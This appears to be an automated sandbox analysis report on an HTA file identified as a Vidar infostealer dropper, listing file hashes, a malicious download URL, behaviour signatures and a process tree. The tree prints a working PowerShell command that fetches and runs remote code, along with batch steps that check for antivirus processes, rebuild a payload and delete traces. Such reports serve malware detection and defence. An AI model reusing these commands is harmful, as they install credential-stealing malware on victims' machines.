Analysis
-
max time kernel
94s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
23-12-2024 13:17
General
-
Target
DRQXP60YUH.hta
-
Size
722B
-
MD5
4f2067f591d1db46908f42c461b43bc8
-
SHA1
dbb6c2be0345648645105f5f8646662e319a01ba
-
SHA256
edebb1c19818a5dc2f09d95f6852c328e9427bc460c3517b543cdf101fba7d84
-
SHA512
5fde4eea4445de8ac73e510c43475b025d12d8f4e9c71e230d7b99a49efc8c6fa381bcda09295c26afb294bd67cf0a63c20f538dd3b66b702ca9f1ac75bf1c9a
Malware Config
Extracted
https://polovoiinspektor.shop/secure/login.txt
Signatures
-
Detect Vidar Stealer 4 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar family
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 51 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\DRQXP60YUH.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9wb2xvdm9paW5zcGVrdG9yLnNob3Avc2VjdXJlL2xvZ2luLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\usovrqir\usovrqir.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7F6.tmp" "c:\Users\Admin\AppData\Local\Temp\usovrqir\CSCC3C5227D2F774B449322A376ECA9819.TMP"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\bc321axi.b2t.exe"C:\Users\Admin\AppData\Local\Temp\bc321axi.b2t.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6236155⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Distances5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Duck" Ix5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\623615\Wb.comWb.com f5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\1D2DTRQIEU37" & exit6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
925KB
MD562d09f076e6e0240548c2f837536a46a
SHA126bdbc63af8abae9a8fb6ec0913a307ef6614cf2
SHA2561300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
SHA51232de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f
-
Filesize
290KB
MD544bb200868649a063953cf0bb7528502
SHA17db0b074ddb4f52eaf6ecbfbf41ce67a44b0daee
SHA2567d2d6b8d47b9ee4ade15bd0c992190554268f235c18b27ea8c213d474ad6f7d8
SHA5125592078c4aa02737000942fe204111c72c547b0732a26cb776c572441dbe8bcb9dcbe2443ede3fee47899e88e998f2a3b610ced103e834fa34673f28b55e5ba8
-
Filesize
96KB
MD5cf44a9847f3fb78e1b20e0f6058e073a
SHA147517215a4145d9dcddb3306c0fb931c71ddfe9d
SHA256d2e7128b474ac99272c683aaeee8a8f8bdc8638a28d7b5e769c2b894ebc45b31
SHA512eaa9141b5c4bc8fcad07bf71a6dc14990b83b472bb8fbc156aaf694bc4a9fd984793f4bcd4058b6fb3d6fe88ad828bce2a8d44f556d3f67870ac484021510fe4
-
Filesize
61KB
MD5bbe29e56ffe75996e8ca9090d7d77f90
SHA1d9aa67c8d72e772a80a5fe91b5fa2055abd7f703
SHA25609ef3302b1439ce599d2aba0d63131a3c4dcbcba50a37abf97d700f120e5fcc1
SHA512f0270133761b242495f079a91625ee365d2e9b127de3ecc773f0228fdf6e874b53ecfc09ab81ee7c5b0b8c5edba99ca74017692d032c0ba520951b92d267cf3e
-
Filesize
64KB
MD5ee05be18d113eb275f51315fb037f70d
SHA17869c95e14b3b7f62dcff7f1f2466176af343cd5
SHA2560f914bbe769aa4e7b0e26e0fa78714a7213050ef3907ccfa4a1488ce3b20df45
SHA5120c857df0f87b7b4b53492aa743064c11335d1d99ae82d4ea252048d3b7550174224212dc9ee15b075be371b84fd17a5ee3cf1c7094fd0586d90e9f88b2a46045
-
Filesize
476KB
MD5c83a25d37c14b33c8c977950706e4087
SHA16116cf0a57be99402db4c76f72751e33d45b055f
SHA256d84347b22e026490edb739141cd5aee2e1a97ee6050e07b93df005a61ec29f6f
SHA51278ec95011f8ba59a734bc2706cb311201da0014863b374bb9431394d716095887cd1a923dd39442da8d5d0ba9fa6976e1eadf4eaa836e9c6583d322f9dd55c8f
-
Filesize
82KB
MD59055cd07ebc236d6a9ed59a00976303f
SHA1b55ef932607c144e36b6729f59a0df49af31c546
SHA256d08694349bc677e90fe0d2e398d84022057b042c386d861273e6b7339f532249
SHA5129344045948b93c8305703e9e5e2ed6bb58535028ad58881e06727ae88b058e19e25fd7e790739383b1a3e1b2f11f73afac7fd9dca7bb677cc90da426d3996abe
-
Filesize
86KB
MD5ad99fa74f69f99f32fa2d01579bf7080
SHA10b94621b4c8d976de408e736811af2a2b231dd85
SHA25650d7f8da31679bb21dd88a973c03ea2d5da501f7b241a740bc1fa98c5b53ccbb
SHA51277ae1948f088abd47ab53d8c228dff2b0479f73a455cc33a4f2ad3bf8f855579fc07a1d6e962c4d822de63fe3e0b01973b7d1608f12bd6893a04ec9619b9c10b
-
Filesize
25KB
MD52cbba7ba80508761f55ffd4beb853102
SHA1fe71788dca26e77f22548ffc39f01bc8f55d2823
SHA256b5f643db2b4dfc24718865707806f6dd22d9a54eae16a603c7feffe9d98b49ce
SHA51214ab42b3b60d7e7032b0836d0a53670a2d231200121da5618b06962a401903720a736df28d049f7cb3fe21e8da09acc6dafae5b86bb6afbd79307d99b80c6c09
-
Filesize
125KB
MD5b472c3173839488298c86f463853d522
SHA14ea19e681d58dbd02318522523117290e5c34f64
SHA2560ff238b71b54c5f33f282ca1e5c3d448bdc37ad8e67ef818766eaf965ee39b8d
SHA5126b1a0b419229c0e101624d293640e12ca15de1063ea1ed8f1223072c5071cd952d57e2d7fe88e7f68b295e52b899b3773545b6e7e4fc127d0742814eb2a645e8
-
Filesize
7KB
MD59748ff1c8dd58352459f2451049af2a2
SHA1c0a19f1e749fa58bc03b7207d1be88d054c6c16d
SHA256f6d4c8ebb3c24d734f4888df2ceca12f2836bb999f58e78dcd05cff4b27c135b
SHA5123eb9d6beac6ea2c1fd8ecfcbcf159459b0b236b2c997191e84da058d5162cc9a77d132ebc42fde26891e13959ddc2a81bc8cc47c97111e42c7e5ba4e6e33ee9f
-
Filesize
1KB
MD59adb0ca1567f35d30c412cbe89a53027
SHA1a32e1d9eb580ce408943b1d91372091967b18be9
SHA25629b99f845b00ea87a7da8b57001bf0561d5c87ebdda8caefaa3248edd7c87dca
SHA512986234c956d90c732656dd16de58b528af17040364311f89f8d98a45736a7dd9c6394d4c36028b73575ded030654a84512711fa14153f079284508e964f40da6
-
Filesize
75KB
MD54f00e7d3c58ab52d2c6e8b6935b14e0d
SHA1634aaef4c09cc4f8be78c7a8d1b7cb72f184c073
SHA2561629fda7c2acc6e2c91b128fcd713efc4282fe6ac169d3804f639c16957efff0
SHA51264873a21e2c0a581f9ab4ff6933fabcf117860998e73227340d0666d2c0e7017de8f57db8216dd643f9daf8c11ce73eef41e986e55ee7b64aad30435a6d5bde1
-
Filesize
56KB
MD58daac6f10e63c4e0b8dddecaf6b8e0ef
SHA139441368910496dc889fe74ae20963e53f08a459
SHA2563a479c5821fce8189ca2d04b48f7078f2266e8fd80e57ca4b6f4b9b2b724b26f
SHA5127064cd9bbac4f9b792528b98b1f86bb9a283481f16c85a792d34c0d2f30a9bc4200cdf12eadfffc6720ef64b2df4187828dc7df0e836aeb7bb2ab6ccd022c93c
-
Filesize
136KB
MD56567d0c4aca999258d881932a4a6925a
SHA1c82d413aa3d63f8b540f5ec85cb6993323c80a39
SHA256b54a2ab660d285af9f9e829d97a7550b1640803c1bea965e747e92cb29a54ca3
SHA5124cb7fa0c47009134d29523cfa005541eeb4f755bb884117a25983f3c92bd69a7d4f6499429074f5f9ff0597e4abc1c08cd804f78bcbb694d84f1bb522efc5dba
-
Filesize
63KB
MD5d46df033b2afd716f44e8e9482b0c3f1
SHA1058928cf46326c10f4f11bc817c387f4a3ad1a49
SHA256d96c4cc9b7c57e3999b16a9ce661208b6d7782c6d12d9b7054cf737a18765d11
SHA5122436c4733b94a8b8ec58d321fa4533af7ad1cae69bd4b5e7cb4e7d50b00fb369fd421664f0f1851f7634cba86e6ed81622c3099974ced2d81a9279616bab4f46
-
Filesize
86KB
MD5ff2ceec537d5b6f00e079f35a28eca2f
SHA102e6b54bf4bb40e8aa2e633331f1a6fcb8e4fd43
SHA256a42a43439f637db2cd812fcf086388808bbf5dd103e7e7d20590707d0c38597e
SHA51226bfa8b19d875d41601f538a99d4eaa0fc04388f6d0689e2b4d22607aac5261e03e42d2e2804690ce1d6fc3a9317a969b1d0d94568cbd6a73843e7fdefc1989b
-
Filesize
1KB
MD59dc6e8781399f3c0483cfd445d232b27
SHA1a0d0280afd354d700be4afd3ba7a6c63f857acaa
SHA256537210ed5ec65811345d51719e0dfacf4d0478040b7161d8c31c482db0ea221f
SHA5126cfe88d8be0e6e83529dec3c62584bbf5116a065324d368c07b59ee90f34593c5dbfb1f4dd34daf4768cb7f24a254e75bb16d45f6d22ae3c399bdb1c17544b68
-
Filesize
87KB
MD50d9676b0ace617d2f4b1e3d382fff695
SHA15b60c826a38c70430bab8017b76a27d945fbdbe3
SHA256738d4b9e1c15109b85d7f0a06748dcf4ec018a0ef4abe917552f59a84ae6c03d
SHA512b81d208d807634b9be1fc42f036fd4da41e50f84edd232b736f8588b22c5a4cf7534196ce6c873f2e9bab264ad4a11a9f5cbd3e6037e85dae58e766e81369188
-
Filesize
119KB
MD519046e554a09e864445f82438d104a1a
SHA10706e729f7a4e535050dff2b2830781afc47d38e
SHA25605f50ab0792f99e7d107ec120f436a093d94d97b75bcde861e19fa29f842c8f1
SHA5122c9c9385bcec66ba5dd11dff14e383f72fc67e3be3f3529cbae8b2a4741f13b1b931a692c4b6f7ba2a5a0a9958141f7e6100d0ea631feee887fa6d279ad2e24a
-
Filesize
70KB
MD5de0be63d4a9cd3b9d4137ec3c72d0951
SHA119f744279539dd41f4e591c5efe35101f3a7f5bc
SHA2566f2d36e5713cd1a319a8ce22171b16c95c9d0c3d7f75ff6a93e1ebdf19dc8977
SHA5123ab18e5de48ad1aff696855a7925d32f2e3fa3682f9cd421d7337caa9b35c9f3070b75c20711be9e016959fa8ed17176cc3fccf5af8bb2304edc57fbf37b4b82
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
MD506342512b7bcdfdda8d6ea8e2d5a24e4
SHA15a656ac27d5a03ee63f08dd499bacd01e0a12c3f
SHA25689b55665c76315777e1f2a9a5be784fd2590b917388f657c6f5c2caa055e87c2
SHA5125824c39a30b7acacd949812bafcf99afcdc95361b2196567aae4e1f2445803c37971a572537c132a01b930e204745ccf7f082386147ea3b611c745eef2ea3eb4
-
Filesize
3KB
MD5e9255f02fa166a2292b3717188e19f85
SHA16cf0a36933adb2cc61660b1eb34419bb20ef44ed
SHA256068984ef9e0d3380855771ec715a9c0e49d6c07140c77a4786ad1d11f2a7cb99
SHA5128c6d14587f6b6f170f6907356fde515ea05d129811e379ea1497717f084e6ce8b1e1cdc267dc33790d4d98b4668e5be1e3574578ceb19f284997e25ef9626e97
-
Filesize
652B
MD5bad625389c0930cd68636ecbb5efaecd
SHA1dd40b63ff6bb1cec81cf9c011bdfa0605f2f7935
SHA2564ccfd52509e4adaa45a6954fb7a2d8f501effa6a5a15c147ba958b51b8be3715
SHA512f46134280449f3ef83da04aface68084292da5ee3ba1e85672cee2e9f9cdee37f8bdf2d851a1efcec65777a8d72690db53c956c62d1e6a884602e1c96e9c52d3
-
Filesize
648B
MD58539b6708ddc98df3a1cd74954dc89bd
SHA1a69c850c26e8ecd62a3dc997164d4c92617fa40d
SHA2560b0d3909c6bdbccc83f6206dd9e50cb8fcfa9cbdc250ac5d926cd0f8698adc3d
SHA512c7d9a203876b75dba73305732026b0d0c6bc699870731a8a67066c1ec068cc6b05a5b3ab64384005f1dcf81fd0a5d5713a30885a56016126258db76d9a2f5afa
-
Filesize
369B
MD51144cc20e937675d8e389d65afc8bbf4
SHA19e351b1be6846b9770c309327f1acccc48dee82e
SHA256350aebdbee7259ab47dc20e6c8ede442a93d13574202a1b5afb4b5d39f8ee035
SHA5126f9559a77f1034401c6a4772a97b4a930172e2722b9f4f6c9c6a69039454a03645ba34a48733e85d1e18a70e6f7498c33c30d39f866e8fd40848f8cc2ed12959
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
320KB
-
Filesize
104KB
-
Filesize
6.2MB
-
Filesize
6.5MB
-
Filesize
712KB
-
Filesize
216KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
304KB
-
Filesize
1.8MB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
5.2MB
-
Filesize
32KB